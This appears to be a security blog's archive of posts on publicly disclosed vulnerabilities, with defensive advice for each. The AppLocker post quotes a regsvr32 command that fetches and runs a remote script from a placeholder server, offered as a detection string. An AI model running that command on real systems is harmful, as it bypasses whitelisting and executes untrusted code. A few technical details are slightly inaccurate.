Tag Archives: Public Disclosure

Punycode makes phishing harder to detect

In mid-April, security researcher Xudong Zheng publicly disclosed (defined) and provided a demonstration of a security vulnerability within popular web browsers e.g. Google Chrome, Mozilla Firefox and Opera which may be used in phishing (defined) attacks.

Why should this vulnerability be considered important?
This vulnerability is not the first of kind, e.g. a similar vulnerability exists in how the DNS protocol resolves device hostnames (defined) (when combined with Service Discovery (SD) provides the capability of network resource distribution beyond the reach of multicast normally limited by the MAC Bridge.
However this vulnerability has the potential to allow an attacker to lead you into clicking a legitimate looking link which may lead to an unexpected website (which an attacker can populate with content of their choice). This may happen since an attacker can send you a highly targeted email (i.e. spear phishing) which you may be expecting and inadvertently click an undesired link or enter login details into a legitimate looking website (following a link from such an email).

Mr. Zheng demonstrates how this vulnerability exploits how web browsers translate letters from other non-Latin languages into Latin letters. For example, he registered the website of apple.com which when visited actually displays the website of xn--80ak6aa92e.com but your web browser will still show apple.com This occurs due to the translation of non-Latin letters into Latin characters making use of Punycode (a recognized standard of the Internet Engineering Task Force).

How can I protect myself from this vulnerability?
While the conventional advice of hovering over any link before clicking to view its actual destination is not redundant it is now significantly less useful.

If you use a password manager which works with your web browser it will not enter your username/password into a website translated from its Punycode. For example, your Apple credentials would not be entered into xn--80ak6aa92e.com

Google has addressed this vulnerability with the release of Chrome version 58. Opera also resolved this issue. Mozilla is currently considering the best means to resolve this vulnerability (Firefox 53 mistakenly shows apple.com) . In the meantime; Mozilla Firefox users can use the steps mentioned at the end of this news article to mitigate this issue.

For any website important to you, please manually type its address into your web browsers address bar to visit the legitimate website. Using encrypted connections where possible is encouraged e.g. https://twitter.com or https://mail.google.com

Thank you.

“DoubleAgent” Vulnerability Disclosure: What you need to know

In late March a security vulnerability was disclosed by the Israeli security firm Cybellum. However this was no ordinary public disclosure as I will explain below. Apologies for the untimely nature of this blog post due to other commitments:

What made this disclosure different?
At first glance this disclosure appeared very serious. It discussed the use of the Microsoft Application Verifier present within Windows XP up to and including Windows 10. They detail the leveraging of this tool to add a customised verifier DLL (defined) to hijack any legitimate process (defined) within Windows.

They demonstrated this attack against anti-malware software specifically Norton Security (by Symantec) resulting in a rogue DLL being injected (defined here and here) into the Norton process (ns.exe as demonstrated within their YouTube video). Despite claims by Cybellum security firms such as Avira and Comodo have reported this attack cannot bypass the self-protection features within their products. The full list of capabilities this attack provides is within this news article.

Windows Internals expert; Alex Ionescu later revealed the researchers from Cybellum used his work concerning protected processes to create this exploit and this was already a known issue. As was pointed out in the Twitter timelines linked to below once an attacker has administrative control over your system they could simply uninstall your security software rather than trying to bypass rendering the threat of this exploit far less important/relevant.

Twitter Timeline 1
Twitter Timeline 2
Twitter Timeline 3
Twitter Timeline 4
Twitter Timeline 5

Does this disclosure only affect security software?
It’s important to note this attack potential affects all software on Windows rather than just security software. In addition the proof of concept (PoC) exploit requires no changes for any application you choose to attack. Security software was chosen since almost all systems have anti-malware software installed and their process names are trusted (and allowed within application white listed (defined) environments).

How can I protect myself from this exploit?
Since this attack requires administrative privileges (defined) on Windows to have the intended effect, using a standard user account for everyday use will mitigate this attack.

From the various statements issued by the affected anti-malware vendors (listed below) please ensure your anti-malware software is the latest version available to ensure this attack is ineffective.

Traditional defences such patching your operating system, your web browser and being cautious of the attachments you open will also reduce the risk posed by this attack.

NetworkWorld Anti-Malware Vendor Responses

Malwarebytes Anti-malware

Symantec Endpoint Protection

Symantec Endpoint Protection Affected Versions

Thank you.

December 2016 Security Updates Summary

Today Microsoft and Adobe released their scheduled monthly security updates, the final scheduled set from both vendors for 2016.

Microsoft’s made 12 bulletins available. These updates address 47 vulnerabilities listed within Microsoft’s security bulletin summary (as before excluding the Adobe bulletin). These are more formally known as CVEs (defined).

As with previous months, fortunately this month (so far) there are no Known Issues detailed within the above mentioned summary page. Monitoring that page before deploying the updates as well as the IT Pro Patch Tuesday blog will keep you well informed enabling you to have the best opportunity to avoid potential issues. If any issues do arise, those pages should be your first places to check for solutions.

Adobe made available 9 security bulletins which included their regular Flash Player update. Depending on which version of Flash Player you have, please review the Adobe security bulletin or Microsoft bulletin as appropriate and apply the recommended updates. Google Chrome users will have the updated installed automatically alongside the updated version of Google Chrome which will most likely be made available by Google either later today or in the next 1 to 2 days.

The Flash Player update addresses 17x priority 1 CVEs. All of Adobe’s priority rating are explained in the previous link. The other 8 security bulletins can be summarised as follows:

Adobe Animate (APSB16-38): Addresses 1x priority 3 CVE.
Adobe Experience Manager Forms (APSB16-40): Addresses 2x priority 3 CVEs.
Adobe DNG Converter (APSB16-41): Addresses 1x priority 3 CVE.
Adobe Experience Manager (APSB16-42): Fixes 4x priority 2 CVEs.
Adobe InDesign (APSB16-43): Fixes 1x priority 3 CVE.
Adobe ColdFusion Builder (APSB16-44): Fixes 1x priority 2 CVE.
Adobe Digital Editions (APSB16-45): Fixes 2x priority 3 CVEs.
Adobe RoboHelp (APSB16-46): Fixes 1x priority 3 CVE.

If you use Flash or any of the above products, please review the security bulletins linked to above and apply the necessary updates.

You can monitor the availability of security updates for the majority of your software from the following websites (among others) or use Secunia PSI:

US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):


A further useful source of update related information is the Calendar of Updates.

News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by making a donation.

If you use any of the above software, please install the appropriate updates as soon as possible. Steps for installing updates for Windows are provided on the “Protecting Your PC” page.

As always; to assist with making the best use of your time when deploying these updates, I will prioritise the updates for you below:

This month is a little different than before since the Microsoft Internet Explorer and Microsoft Edge bulletins when combined address 6 vulnerabilities that are already publicly disclosed (defined). These should be followed by the Adobe Flash update which addresses a zero day vulnerability (defined). Next up would be Microsoft Office, the Windows Graphics component and the Microsoft Uniscribe update due to their criticality.

The remaining security updates can be installed when you have the time to do so. Detailed information on the contents of each security bulletin is published each month within ComputerWorld’s Patch Tuesday Debugged column.

Another security pre-caution that you may wish to take if you have Microsoft EMET (please ensure your version of EMET is the most recent version 5.5) installed is to use it to protect you from Adobe Flash being used to exploit vulnerabilities when you open a Microsoft Office document or Adobe PDF file. I provide recommendations of how to do this at the end of the July 2015 Update Summary.

Please note that Microsoft EMET is in the process of being retired with the end of support scheduled for the 31st of July 2018.

As is my standard practice, I would recommend backing up the data on any device for which you are installing updates in order to prevent data loss in the rare event that any update causes unexpected issues.

Thank you.

Disclosed Microsoft Zero Day Under Attack By APT Group

Update: 8th November:
The Microsoft zero day vulnerability discussed in this post has now been patched. Please refer to this post for the appropriate information and download links.

Thank you.

Original Post:
Earlier this week Google publicly disclosed (defined) details of a new zero day (defined) vulnerability affecting supported versions of Windows up to Windows 10. Fortunately, the disclosure only included minimal details.

Why Should These Issues Be Considered Important?
The vulnerability disclosed by Google could result with an attacker being able to elevate their privileges (defined) on an affected system. However, when used in combination with a previously patched Adobe Flash Player vulnerability (reference previous post) this could result in a Windows system under your responsibility or in your ownership to have a backdoor (defined) installed.

Some good news is that this new exploit primarily targets organisations that operate in the following sectors (thus all other organisations are at somewhat reduced risk): government, intelligence or military organisations.

The nature of the backdoor is the decision of the attacker but would usually include a means of remaining persistent on the system and allowing the attacker to remote access the infected system. This backdoor can then be used to move data of the attacker’s choice off the affected system. The APT group known as STRONTIUM by Microsoft (other aliases used in the wider cyber security industry are APT28, also aka Sofacy aka Fancy Bear aka TsarTeam aka Sednit aka PawnStorm). STRONTIUM is also known for moving laterally throughout the network which they compromise (where the pass the hash (PtH) (defined) technique is the method of choice to do so).

How Can I Protect Myself From This Issue?
While a patch from Microsoft is in progress (scheduled for release on the 8th of November): follow safe email guidelines namely don’t click on unexpected/unsolicited links or open potentially dangerous email attachments to prevent the execution (carrying out of) the exploits actions in the first instance.

If you use the Microsoft Edge or Google Chrome web browsers the exploit for the local elevation of privilege vulnerability will be mitigated. This is due to Chrome’s sandbox (defined) blocking the use of API (defined) calls to the win32k.sys driver (defined). This in addition to its existing mitigations when installed on Windows 10 which I previously discussed.

Microsoft Edge on the other hand implements Code Integrity to prevent the next steps of exploitation.

To protect endpoints within your organisation you could consider utilising the logging capabilities of Microsoft EMET and Systinternals’ Sysmon by processing their logs using a SIEM (defined) and taking action when that SIEM a alerts you to suspicion activity. This is especially true since this exploit can occur from within web browsers, the Java JRE, Microsoft Word and Microsoft PowerPoint (namely that these applications are used to open suspicious/untrusted files).

My thanks to a colleague (you know who you are!) for compiling very useful information for this blog post.

Thank you.

Windows AppLocker Bypass Disclosed

Update: 26th April 2016:
After some further research, this bypass can be blocked by denying regsvr32.exe and regsvr64.exe (depending on your systems architecture) from accessing the internet.

These files are usually present in the following directories (folders):

C:\Windows\System32 (32 bit systems only)
C:\Windows\SysWOW64 (64 bit systems only)

For 64 bit systems you should block any regsvr32.exe or regsvr64.exe that you find in both of the above folders.

You can use your installed firewall to do this or use the built-in Windows Firewall to create a rule to do this. Example steps to create rules for the Windows Firewall are located here and here. Please refer to the support website of the manufacturer of your firewall or it’s user guide if you are using a 3rd party firewall.

Alternatively, you can create a YARA rule to detect the presence of the following string within the memory of the conhost.exe process that is spawned on Windows 7 and later when a script is executed:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

The part of the string we are interested in detecting would be the text after the /i switch.

More information about the conhost.exe process is available in this article.

This bypass does not make changes to the Windows registry but .sct files may be found in the Temporary Internet Files folder. Another well-known security researcher Alex Ionescu said that Device Guard (of Windows 10), fully enabled with script protection will block this bypass as well.

Further discussion and advice for this issue are available within this blog post.

I hope that this information is useful. My thanks to a colleague (you know who you a
re!) for his very useful insights on this topic.

Thank you.

Original Post:
Last week a security researcher made publically available proof of concept code that has the ability to bypass Windows AppLocker (application whitelisting).

I have written about this issue separately using Yammer but will provide more discussion below:

Why Should This Issue Be Considered Important?
According to this ThreatPost article the researcher initially responsibly disclosed (defined) this issue to Microsoft. However, it is uncertain if Microsoft will create a security update or mitigation to address this issue since AppLocker is functioning by design. In 2011 a bypass to AppLocker was discovered by Didier Stevens which was later addressed by Microsoft with a hotfix.

With a known bypass of AppLocker now being disclosed the effectiveness of AppLocker has been significantly reduced. I’m hoping that for this new bypass a similar solution can be found. I’m a particular fan of AppLocker since it provides a strong defence against zero-day malware (defined) and ransomware (defined). It is also relatively easy to configure. An introductory post to configuring AppLocker would be this Malwarebytes blog post.

Since it runs with kernel level privileges (defined) it isn’t easy for an attacker to shut it down and can be configured to block code that is run by an administrator (defined) (unless that code is already whitelisted). The enhancements it received in Windows 10 e.g. blocking a script from being manually entered at the command prompt is a good example of defence in-depth (defined)(PDF) security.

How Can I Protect Myself From This Issue?
As mentioned above, at this time there is no known workaround for this bypass. While blocking Regsvr32.exe using AppLocker may seem like an obvious solution, this is a legitimate application that is often used by Windows especially during program installation and updates. Denying this application from running would likely lead to unexpected behavior.

I’ll monitor this issue and post here should further information become available. Thank you.

Unpatched WinRAR SFX Vulnerability Disclosed

Update: 7th October 2015:
Malwarebytes have carried out additional analysis of this issue and have issued updated guidance on how to protect against it.

Please follow their updated advice to keep your computing devices secure. I echo Malwarebytes’ apology with regard to this issue since the guidance posted by them and I was based on the information available at the time.

Please dis-regard my original post (which has now been removed).

Thank you.

Security Vulnerabilities Disclosed in Kaspersky and FireEye Products

Over the weekend a security researcher, Tavis Ormandy discovered a zero day security vulnerability in Kaspersky Anti-virus 2015 and 2016. The issue was a buffer overflow issue (defined) and could be exploited remotely by visiting a website of an attacker’s choice or receiving specifically crafted data packets from an attacker via the internet connection of the device the Kaspersky product is protecting.

Kaspersky quickly responded to update it’s products to resolve this issue and mentioned that they wish to add further mitigation strategies to prevent an issue such as this being found in their products in the future. In addition, Kaspersky already uses Data Execution Prevention (DEP)(defined here and here) and Address Space Layout Randomization (ASLR)(defined) in order to complicate the exploitation of such overflow attacks. A copy of the statement released by Kaspersky is available at the end of this blog post.

If you are using any of Kaspersky’s security products to protect your device, please ensure that it is up to date to protect against this vulnerability being exploited. Further information on updating a selection of Kaspersky products is provided below:

Updating Kaspersky Anti-Virus 2016
Updating Kaspersky Internet Security 2016
Updating Kaspersky Total Security 2016

Links to 2015 and previous products are also provided within the above pages.

If you have any questions, you can contact Kaspersky for assistance. Links to their product forums are provided on the right hand side of this page with contact links for their support teams for business and home users located at the end of the same page.


In a separate disclosure Kristian Erik Hermansen, a security researcher provided details of 4 vulnerabilities in FireEye’s security appliances. In addition, a further 30 flaws were discovered by his joint work with another researcher Ron Perris.

An official advisory (PDF) was published by FireEye with regards to the initial 4 vulnerabilities disclosed by Hermansen. This document provides further information as well as how to obtain the appropriate updates and further recommended best practices. If you use any of the affected products, please follow the steps within the advisory to patch these issues as soon as possible.

I will continue to monitor these issues and will update this blog post as more information becomes available.

Update: 15th September 2015: Further vulnerabilities were patched by FireEye in their products as documented in this advisory. However no further details concerning the issues previously discussed have been made available. If you use any of FireEye’s NX, EX, CM, AX or FX products please ensure that they are running the most current release available from FireEye as mentioned in both FireEye advisories.

Thank you.

Zero Day Initiative (ZDI) Publically Discloses 4 New Internet Explorer Vulnerabilities

Update: 6th August 2015:
Sorry for not updating this post sooner. According to two separate new articles here and here, only one of these zero day flaws affected the desktop version of IE (installed on workstations, laptops and servers). This flaw ZDI-15-359 has been previously patched by Microsoft. In addition, the remaining three flaws affect the version of IE bundled with Windows Phones. A smaller number of Windows Phone users are affected than the number of devices that run the desktop version of IE; however Windows Phone users should monitor for an update to their phone’s software that should resolve these remaining security issues.

In addition, while these issues were publically disclosed in July, exact details of the issues were not provided in the above linked to advisories by ZDI. Public disclosure usually means all details are disclosed but in this case the right decision of not to publish exact details should help reduce the risk to users until these remaining issues are patched.

Thank you.
Original Post:
Between late 2014 and early 2015 HP’s Zero Day Initiative (ZDI) responsibly disclosed (defined) 4 security vulnerabilities within Internet Explorer (IE) to Microsoft. In all 4 of the disclosures, Microsoft investigated and provided information regarding an expected build/version of IE that would resolve these issues but in all cases, no expected date for this updated build was provided. ZDI notified Microsoft of their intention to disclose details of these flaws publically following the end of a 120 day deadline.

For each of these 4 security vulnerabilities disclosed by ZDI, each must be exploited by a user visiting a compromised legitimate website (as seen in watering hole attacks) or a website specifically designed to exploit these flaws.

What Can I Do To Defend Myself From These Unpatched Issues?

  1. A suggestion that does not cost any funds and is easy to implement would be to use another web browser until these issues are patched e.g. Mozilla Firefox, Apple Safari, Opera and Google Chrome being the most popular choices.
  2. Use caution when clicking on any links in emails, instant messages or social networking posts when the links were received unexpectedly or the wording of such messages is suspicious. For shortened links, consider using a preview service to check the destination of the full link before visiting it. Links to preview services are available within the “Protecting Your PC” page of this blog.
  3. Install and enable the default settings of Microsoft EMET. On my personal PCs which use Windows 8.1 64 bit and Windows 7 64 bit I have all mitigations for IE 11 64 bit enabled. A list of known EMET application incompatibilities is available here. You can also ask questions within the EMET forum. The following are very useful tutorials on EMET 5 and EMET 4 (still relevant).
  4. When Windows 10 is released next week, consider using Microsoft Edge since it incorporates additional defences against Use-After-Free flaws (3 of these flaws are use-after-flaws (defined)) and would not be vulnerable to these issues since Edge is based on a separate codebase to IE (Edge is a development fork of IE). For more background information regarding Microsoft Edge, please see a previous blog post of mine.
  5. Each of the ZDI advisories (linked to below) include disabling Active Scripting within IE. While this is an effective mitigation, it may affect the reliable display of the websites that you visit.

The recommendation of using EMET will not only protect against these unpatched flaws but also make exploitation of known flaws much harder. Alternatives to EMET are Malwarebytes Anti-Exploit (free or paid for versions) and HitmanPro.Alert (paid for product).

I will update this post should more information on mitigations for these issues become available or any further information is shared regarding when these issues may be patched.

Links to the 4 advisories published by ZDI are shown below:

ZDI-15-359: Microsoft Internet Explorer CTableLayout::AddRow Out-Of-Bounds Memory Access Vulnerability

ZDI-15-360: Microsoft Internet Explorer CAttrArray Use-After-Free Remote Code Execution Vulnerability

ZDI-15-361: Microsoft Internet Explorer CCurrentStyle Use-After-Free Remote Code Execution Vulnerability

ZDI-15-362: Microsoft Internet Explorer CTreePos Use-After-Free Remote Code Execution Vulnerability

Thank you.

HP Publically Discloses Unpatched Use-After-Free Flaws within (32 bit) Internet Explorer

On Friday of last week HP made available full details of research carried out by 3 security researchers who found new methods of bypassing defences added to Internet Explorer (IE). These are the same researchers that I mentioned in an earlier post. While Microsoft used this research to improve the security of Internet Explorer they only did so for the 64 bit version Internet Explorer. The 32 bit version remains vulnerable to the techniques outlined in this research.

In a blog post HP provided the reasons why Microsoft would not patch the 32 bit version of Internet Explorer. I have summarized these reasons below:

  • 64 bit versions of IE benefit the most from ASLR

While this fact is not in doubt, the 32 bit version of IE is still very widely used as I mentioned in a previous blog post. There is a possibility that the amount of development and testing needed to resolve these flaws in the 32 bit version may be much larger than the benefit they would provide. Use-After-Free flaws are usually given Important or Critical severity ratings since such flaws generally require little to no user intervention for them to take place. If zero day exploits begin to appear, Microsoft may be forced to reverse this decision.

    • MemoryProtect has led to a significant decrease of IE case submissions

Presumably case submissions refers to the number of Use-After-Free and other memory corruption flaws being submitted to Microsoft for analysis. Again while I acknowledge this is the case and that no mitigation/defence is perfect; when known security issues are presented to you and can impact a very large number of users you should still try to either reduce the risk further or (if possible) eliminate these issues completely (by in this instance, patching them).

Aside: What is a Use-After-Free vulnerability?
As a web browser downloads and processes the web page that you have requested to view, it stores the results in memory (the Random Access Memory (RAM) of your PC). When you close a tab of your browser, your browser will mark the memory in which that webpage was stored as free (for further use at a later time).

However where the browser marks memory that it has finished using as free but then tries to use it again (either unintentionally via a software bug resulting from human error or maliciously via a piece of malware), malicious code can be placed by an attacker within that section of memory marked as free and when the browser accesses that section again, it can execute that code. Such exploits are discussed in more detail in this Cisco blog post.

Further alternative definitions of a use-after-free issue are also available:

Red Hat (in reference to a recent Linux kernel vulnerability)
Perception Point: exploiting a use-after-free on a Linux system
Microsoft (also details use-after-free mitigations built into Microsoft Edge and Internet Explorer).

Some may feel that I have been unduly harsh on Microsoft in the above comments. I do believe that not all of the information as to why these issues are not going to be patched has been provided. I also believe that Microsoft should at least consider implementing the suggestions within pages 19 to 21 of this white paper to make exploitation of these issues more difficult.

One interesting point that is raised in the HP blog post is the following “Since Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers).” That comment makes more sense (especially if such non-default configurations are not recommended) but no detail is provided as to what settings make IE vulnerable to these flaws (and thus you can’t make the necessary changes to your configuration to mitigate these flaws). It will be interesting if any more information can be obtained concerning this non-default configuration.

What Can I Do To Defend Myself From These Unpatched Issues?

  1. A suggestion that does not cost any funds and is easy to implement would be to use another web browser (Mozilla Firefox, Apple Safari, Opera and Google Chrome being the most popular choices).
  2. If you are using a 64 bit version of Windows (you can view this page to check which version you have), use the 64 bit version of IE instead of the 32 bit version. This post explains how while this post also provides steps to enable all IE’s processes to be 64 bit rather 32 bit. If you find an add-on that you use frequently does not work with the 64 bit version of IE, simply reverse the steps in the above tutorials temporarily. Alternatively navigate to the folder: C:\Program Files (x86)\Internet Explorer and double click iexplore.exe to open the 32 bit version of IE.
  3. Install and enable the default settings of Microsoft EMET. On my personal PCs which use Windows 8.1 64 bit and Windows 7 64 bit I have all mitigations for IE 11 64 bit enabled (please note that I have ActiveX filtering enabled and thus no add-ons are running within IE on my PCs). The same settings should work for IE 32 bit. A list of known EMET application incompatibilities is available here. You can also ask questions within the EMET forum. The following are very useful tutorials on EMET 5 and EMET 4 (still relevant).
  4. When Windows 10 is released consider using Microsoft Edge since it incorporates additional defences against Use-After-Free flaws and will always be a 64 bit process on a 64 bit version of Windows 10.

The recommendation of using EMET will not only protect against these unpatched flaws but also make exploitation of known flaws much harder. Alternatives to EMET are Malwarebytes Anti-Exploit (free or paid for versions) and HitmanPro.Alert (paid for product).

I hope the above information is useful in defending against these unpatched flaws. When I first read the blog post from HP I initially thought that the 32 bit version of IE was being ignored but the information stating that these issues only affect non-default configurations of 32 bit IE makes these issues much less serious. If any further information on these flaws become available, I will update this blog post.

Thank you.